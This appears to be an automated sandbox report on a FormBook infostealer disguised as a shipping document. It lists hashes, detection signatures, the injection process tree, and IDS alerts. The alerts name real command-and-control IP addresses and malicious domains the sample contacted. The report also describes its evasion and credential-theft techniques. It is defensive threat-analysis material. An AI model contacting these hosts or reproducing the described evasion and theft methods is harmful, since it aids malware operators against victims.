Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SHIPPING DOC_20241107.exe

Overview

General Information

Sample name:SHIPPING DOC_20241107.exe
Analysis ID:1550932
MD5:6fc4f6b2894fa46c60c67d2b8defd64e
SHA1:9af4784d85e8ac730c38de094088f93c433d1e3e
SHA256:392d0101e35db0734783ac87d4dd920f178b414cd0027eedd391fc0fcadc5798
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w7x64
  • SHIPPING DOC_20241107.exe (PID: 3516 cmdline: "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe" MD5: 6FC4F6B2894FA46C60C67D2B8DEFD64E)
    • svchost.exe (PID: 3560 cmdline: "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)
      • AhEyCWkdTLz.exe (PID: 1648 cmdline: "C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • AtBroker.exe (PID: 3596 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: 3CA2BB895E204478C7A4C9BAF70970CE)
          • AhEyCWkdTLz.exe (PID: 652 cmdline: "C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3840 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.873933070.00000000001B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.436520319.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.369012864.0000000000370000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.874124663.0000000000AE0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.873906744.0000000000070000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.1.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.1.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOC_20241107.exe, ParentProcessId: 3516, ParentProcessName: SHIPPING DOC_20241107.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe", ProcessId: 3560, ProcessName: svchost.exe
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\AtBroker.exe, ProcessId: 3596, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe", CommandLine: "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe", ParentImage: C:\Users\user\Desktop\SHIPPING DOC_20241107.exe, ParentProcessId: 3516, ParentProcessName: SHIPPING DOC_20241107.exe, ProcessCommandLine: "C:\Users\user\Desktop\SHIPPING DOC_20241107.exe", ProcessId: 3560, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T10:50:07.758624+010028554651A Network Trojan was detected192.168.2.2249161156.234.28.9480TCP
                2024-11-07T10:50:31.694050+010028554651A Network Trojan was detected192.168.2.224916638.88.82.5680TCP
                2024-11-07T10:50:44.981050+010028554651A Network Trojan was detected192.168.2.224917015.197.148.3380TCP
                2024-11-07T10:50:58.540910+010028554651A Network Trojan was detected192.168.2.2249174194.58.112.17480TCP
                2024-11-07T10:51:12.236532+010028554651A Network Trojan was detected192.168.2.224917815.197.148.3380TCP
                2024-11-07T10:51:26.416495+010028554651A Network Trojan was detected192.168.2.2249182104.21.14.18380TCP
                2024-11-07T10:51:40.474759+010028554651A Network Trojan was detected192.168.2.224918667.223.117.14280TCP
                2024-11-07T10:51:53.786205+010028554651A Network Trojan was detected192.168.2.22491903.33.130.19080TCP
                2024-11-07T10:52:07.930169+010028554651A Network Trojan was detected192.168.2.2249194113.20.119.3180TCP
                2024-11-07T10:52:22.182248+010028554651A Network Trojan was detected192.168.2.224919847.129.103.18580TCP
                2024-11-07T10:52:49.886271+010028554651A Network Trojan was detected192.168.2.2249206206.119.81.3680TCP
                2024-11-07T10:53:03.749152+010028554651A Network Trojan was detected192.168.2.2249210142.250.185.11580TCP
                2024-11-07T10:53:17.171378+010028554651A Network Trojan was detected192.168.2.22492143.33.130.19080TCP
                2024-11-07T10:53:30.960649+010028554651A Network Trojan was detected192.168.2.2249218154.23.184.9580TCP
                2024-11-07T10:53:44.584974+010028554651A Network Trojan was detected192.168.2.2249222185.27.134.14480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-07T10:50:23.418242+010028554641A Network Trojan was detected192.168.2.224916338.88.82.5680TCP
                2024-11-07T10:50:26.438847+010028554641A Network Trojan was detected192.168.2.224916438.88.82.5680TCP
                2024-11-07T10:50:28.280726+010028554641A Network Trojan was detected192.168.2.224916538.88.82.5680TCP
                2024-11-07T10:50:36.737348+010028554641A Network Trojan was detected192.168.2.224916715.197.148.3380TCP
                2024-11-07T10:50:39.900365+010028554641A Network Trojan was detected192.168.2.224916815.197.148.3380TCP
                2024-11-07T10:50:41.822475+010028554641A Network Trojan was detected192.168.2.224916915.197.148.3380TCP
                2024-11-07T10:50:50.049612+010028554641A Network Trojan was detected192.168.2.2249171194.58.112.17480TCP
                2024-11-07T10:50:53.461199+010028554641A Network Trojan was detected192.168.2.2249172194.58.112.17480TCP
                2024-11-07T10:50:55.134156+010028554641A Network Trojan was detected192.168.2.2249173194.58.112.17480TCP
                2024-11-07T10:51:03.960720+010028554641A Network Trojan was detected192.168.2.224917515.197.148.3380TCP
                2024-11-07T10:51:07.118251+010028554641A Network Trojan was detected192.168.2.224917615.197.148.3380TCP
                2024-11-07T10:51:09.046020+010028554641A Network Trojan was detected192.168.2.224917715.197.148.3380TCP
                2024-11-07T10:51:17.578604+010028554641A Network Trojan was detected192.168.2.2249179104.21.14.18380TCP
                2024-11-07T10:51:21.305164+010028554641A Network Trojan was detected192.168.2.2249180104.21.14.18380TCP
                2024-11-07T10:51:22.672545+010028554641A Network Trojan was detected192.168.2.2249181104.21.14.18380TCP
                2024-11-07T10:51:31.896535+010028554641A Network Trojan was detected192.168.2.224918367.223.117.14280TCP
                2024-11-07T10:51:35.162421+010028554641A Network Trojan was detected192.168.2.224918467.223.117.14280TCP
                2024-11-07T10:51:36.986751+010028554641A Network Trojan was detected192.168.2.224918567.223.117.14280TCP
                2024-11-07T10:51:45.516491+010028554641A Network Trojan was detected192.168.2.22491873.33.130.19080TCP
                2024-11-07T10:51:48.696416+010028554641A Network Trojan was detected192.168.2.22491883.33.130.19080TCP
                2024-11-07T10:51:50.606283+010028554641A Network Trojan was detected192.168.2.22491893.33.130.19080TCP
                2024-11-07T10:51:59.052723+010028554641A Network Trojan was detected192.168.2.2249191113.20.119.3180TCP
                2024-11-07T10:52:02.862448+010028554641A Network Trojan was detected192.168.2.2249192113.20.119.3180TCP
                2024-11-07T10:52:04.128866+010028554641A Network Trojan was detected192.168.2.2249193113.20.119.3180TCP
                2024-11-07T10:52:13.209633+010028554641A Network Trojan was detected192.168.2.224919547.129.103.18580TCP
                2024-11-07T10:52:28.053275+010028554641A Network Trojan was detected192.168.2.224919938.47.237.2780TCP
                2024-11-07T10:52:31.228829+010028554641A Network Trojan was detected192.168.2.224920038.47.237.2780TCP
                2024-11-07T10:52:33.128183+010028554641A Network Trojan was detected192.168.2.224920138.47.237.2780TCP
                2024-11-07T10:52:41.099758+010028554641A Network Trojan was detected192.168.2.2249203206.119.81.3680TCP
                2024-11-07T10:52:55.281766+010028554641A Network Trojan was detected192.168.2.2249207142.250.185.11580TCP
                2024-11-07T10:52:58.648287+010028554641A Network Trojan was detected192.168.2.2249208142.250.185.11580TCP
                2024-11-07T10:53:00.369113+010028554641A Network Trojan was detected192.168.2.2249209142.250.185.11580TCP
                2024-11-07T10:53:08.924796+010028554641A Network Trojan was detected192.168.2.22492113.33.130.19080TCP
                2024-11-07T10:53:12.977421+010028554641A Network Trojan was detected192.168.2.22492123.33.130.19080TCP
                2024-11-07T10:53:14.025652+010028554641A Network Trojan was detected192.168.2.22492133.33.130.19080TCP
                2024-11-07T10:53:22.208640+010028554641A Network Trojan was detected192.168.2.2249215154.23.184.9580TCP
                2024-11-07T10:53:25.870570+010028554641A Network Trojan was detected192.168.2.2249216154.23.184.9580TCP
                2024-11-07T10:53:27.289467+010028554641A Network Trojan was detected192.168.2.2249217154.23.184.9580TCP
                2024-11-07T10:53:36.038217+010028554641A Network Trojan was detected192.168.2.2249219185.27.134.14480TCP
                2024-11-07T10:53:39.518506+010028554641A Network Trojan was detected192.168.2.2249220185.27.134.14480TCP
                2024-11-07T10:53:41.136815+010028554641A Network Trojan was detected192.168.2.2249221185.27.134.14480TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: SHIPPING DOC_20241107.exeAvira: detected
                Source: https://00808.vip/Avira URL Cloud: Label: malware
                Source: SHIPPING DOC_20241107.exeReversingLabs: Detection: 47%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.873933070.00000000001B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.436520319.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369012864.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.874124663.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.873906744.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.873918569.0000000000160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369018456.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.369105032.0000000002980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.874128931.0000000004EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: SHIPPING DOC_20241107.exeJoe Sandbox ML: detected
                Source: SHIPPING DOC_20241107.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: ATBroker.pdb2$ source: svchost.exe, 00000002.00000002.369002728.0000000000294000.00000004.00000020.00020000.00000000.sdmp, AhEyCWkdTLz.exe, 00000003.00000002.873933588.00000000004E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AhEyCWkdTLz.exe, 00000003.00000000.350491590.000000000136E000.00000002.00000001.01000000.00000004.sdmp, AhEyCWkdTLz.exe, 00000005.00000002.874244565.000000000136E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: ATBroker.pdb source: svchost.exe, 00000002.00000002.369002728.0000000000294000.00000004.00000020.00020000.00000000.sdmp, AhEyCWkdTLz.exe, 00000003.00000002.873933588.00000000004E4000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SHIPPING DOC_20241107.exe, 00000000.00000003.347728935.0000000002940000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC_20241107.exe, 00000000.00000003.347838149.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.369027051.0000000000880000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348646748.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348324365.0000000000450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.369027051.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874145495.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000002.874145495.0000000001F50000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000003.370964344.0000000001DC0000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000004.00000003.370658055.0000000001C60000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: AtBroker.exe, 00000004.00000002.874304385.00000000027FC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000004.00000002.873985297.000000000044E000.00000004.00000020.00020000.00000000.sdmp, AhEyCWkdTLz.exe, 00000005.00000000.383610146.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.436603581.0000000000E9C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_00A1449B
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00A1C7E8
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1C75D FindFirstFileW,FindClose,0_2_00A1C75D
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A1F021
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A1F17E
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A1F47F
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A13833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A13833
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A13B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A13B56
                Source: C:\Users\user\Desktop\SHIPPING DOC_20241107.exeCode function: 0_2_00A1BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A1BD48

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49161 -> 156.234.28.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49166 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49165 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49174 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49177 -> 15.197.148.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49163 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49168 -> 15.197.148.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 15.197.148.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49176 -> 15.197.148.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49169 -> 15.197.148.33:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49170 -> 15.197.148.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49167 -> 15.197.148.33:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49178 -> 15.197.148.33:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 104.21.14.183:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49182 -> 104.21.14.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49185 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49186 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 104.21.14.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49189 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49188 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49191 -> 113.20.119.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49195 -> 47.129.103.185:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49198 -> 47.129.103.185:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49181 -> 104.21.14.183:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49164 -> 38.88.82.56:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49190 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49203 -> 206.119.81.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49216 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49218 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49212 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49210 -> 142.250.185.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49213 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49222 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49220 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49221 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49200 -> 38.47.237.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49207 -> 142.250.185.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49201 -> 38.47.237.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49219 -> 185.27.134.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49206 -> 206.119.81.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49192 -> 113.20.119.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49214 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49184 -> 67.223.117.142:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49193 -> 113.20.119.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49215 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49187 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49217 -> 154.23.184.95:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49194 -> 113.20.119.31:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49211 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49208 -> 142.250.185.115:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49173 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49199 -> 38.47.237.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49209 -> 142.250.185.115:80
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeDNS query: www.kghjkx.xyz
                Source: C:\Program Files (x86)\eWGLawkqDiAOqdkyBWluAHEihTmqqLNFDyAuJkZZhXXrFySCHcAnMJbhGo\AhEyCWkdTLz.exeDNS query: www.iuyi542.xyz
